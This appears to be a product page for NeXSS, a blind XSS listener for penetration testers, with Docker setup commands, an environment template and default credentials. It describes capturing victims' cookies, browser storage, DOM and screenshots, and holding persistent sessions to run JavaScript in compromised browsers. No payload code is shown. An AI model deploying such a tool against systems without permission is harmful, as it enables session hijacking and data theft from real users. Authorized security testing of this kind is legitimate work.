Modern Blind XSS Hunter & Listener
Everything you need for XSS hunting
NeXSS provides a comprehensive toolkit for security researchers and penetration testers to discover and validate blind XSS vulnerabilities.
Blind XSS Detection
Automatically captures comprehensive data when your payloads execute on target systems.
Screenshot Capture
Takes high-quality screenshots of the vulnerable page using html2canvas technology.
Cookie Extraction
Captures all accessible cookies from the target domain for session analysis.
DOM Capture
Stores the full HTML content of the affected page for detailed analysis.
Storage Extraction
Captures localStorage and sessionStorage data from the compromised session.
Persistent Sessions
Maintain connection with compromised browsers for real-time JS command execution.
Traffic Interception
NEWNEW! Observe HTTP requests/responses within the victim's browser session.
AES-256 Encryption
Secure communication channel for persistent sessions with military-grade encryption.
Telegram Notifications
Real-time alerts with screenshots when XSS triggers, delivered to your Telegram.
Object Storage
Store screenshots in S3, MinIO, or Cloudflare R2 for scalable storage.
JWT Authentication
Secure session management with industry-standard JSON Web Tokens.
Docker Ready
Easy deployment with Docker Compose. Get started in minutes, not hours.
Simple yet powerful workflow
NeXSS streamlines your XSS hunting process from payload deployment to post-exploitation.
Deploy Your Payloads
Configure your XSS payloads from the dashboard. NeXSS generates various payload formats ready for injection into target applications.
XSS Triggers
When a payload executes on a vulnerable application, NeXSS automatically captures screenshots, cookies, DOM content, and more.
Get Notified
Receive instant Telegram notifications with screenshot previews. Never miss a successful XSS trigger again.
Analyze & Execute
Review detailed reports in your dashboard. Use persistent sessions to execute commands in the victim's browser.
Get started in minutes
Choose your preferred installation method. Docker is recommended for the easiest setup.
Quick Start with Docker
# Clone the repository
git clone https://github.com/mastomii/nexss.git
cd nexss
# Configure environment
cp .env.example .env
# Start the application
docker compose up -dEnvironment Configuration
# Database
DATABASE_URL=postgresql://nexss:your_secure_password@db:5432/nexss
POSTGRES_USER=nexss
POSTGRES_PASSWORD=your_secure_password
POSTGRES_DB=nexss
# Authentication (generate with: openssl rand -hex 32)
JWT_SECRET=your_jwt_secret_here
NEXTAUTH_SECRET=your_nextauth_secret_here
NEXTAUTH_URL=http://localhost:3000
# Public URL for payload callbacks
NEXT_PUBLIC_APP_URL=https://your-nexss-domain.comDefault Credentials
After installation, access the dashboard at http://localhost:3000
adminPassword: admin123⚡ Change the default password immediately after first login!
See NeXSS in action
A modern, intuitive interface designed for security professionals.
Dashboard Overview
Real-time statistics and recent reports at a glance
Ready to hunt Blind XSS?
Join security researchers worldwide using NeXSS to discover vulnerabilities. Deploy in minutes, start hunting immediately.
⚠️ Disclaimer
This tool is intended for authorized security testing only. Only use NeXSS against systems you have explicit permission to test. Unauthorized access to computer systems is illegal. The developers assume no liability for misuse of this software.